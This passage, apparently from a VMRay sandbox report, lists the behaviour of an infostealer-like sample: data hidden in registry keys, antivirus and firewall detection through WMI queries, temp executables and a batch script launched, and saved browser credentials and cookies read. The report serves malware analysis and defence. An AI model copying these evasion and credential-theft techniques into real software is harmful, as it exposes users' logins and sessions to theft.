"1F4C22565107A34AD73CB0F585F8F77C". Create system object Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "20BC29E135FB9B01285187E3B5593CC8". Create system object Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 1776 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Omegovna". Write large data into the registry Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "4786CF0F1E6E9E20640CE4A22DFFC997". Create system object Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "35D65C8FBCA06952705002450D6712FC". Create system object Anti Analysis VTI rule match with VTI rule score 5/5 vmray_detect_av_by_wmi_query Check for antivirus software via WMI query: "select * from antivirusproduct". Try to detect antivirus software Anti Analysis VTI rule match with VTI rule score 5/5 vmray_detect_fw_by_wmi_query Check for firewall via WMI query: "select * from firewallproduct". Try to detect firewall Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "A354992B05F4DA0EB1B4AB788E3CE988". Create system object Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe"". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "61AB4C4AE08220DC5911D67B8EFCF107". Create system object Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "F063546A5853AF5508DB5A15751DB34A". Create system object Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 88160 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg". Write large data into the registry Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 200848 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg". Write large data into the registry Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 295088 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg". Write large data into the registry Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Windows\system32\cmd.exe" /c "C:\Users\aETAdzjz\AppData\Local\Temp\upd9dba1b78.bat"". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "A63A6CDA308CF3B4F10C6B82D6B9EA5B". Create system object Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "629BC138D148FEC80DAF76D454EF252E". Create system object OS VTI rule match with VTI rule score 1/5 vmray_use_encryption_api Use above average number of encryption APIs. Use encryption API Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "D3F6CAB61E96B029AD170EEF2C2F89C2". Create system object Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_credentials Read saved credentials for "Mozilla Firefox". Read data related to saved browser credentials Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_credentials Read saved credentials for "Google Chrome". Read data related to saved browser credentials Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_cookies Read Cookies for "Microsoft Internet Explorer". Read data related to browser cookies Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_cookies Read Cookies for "Mozilla Firefox". Read data related to browser cookies Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_cookies Read Cookies for "Google Chrome". Read data related to browser cookies Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 516320 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg". Write large data into the registry Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 792144 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg". Write large data into the registry Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 803104 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg". Write large data into the registry Hide Tracks VTI rule match with VTI rule score 2/5 vmray_hide_data_in_registry Hide 822944 byte in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci\Eteg". Write large data into the registry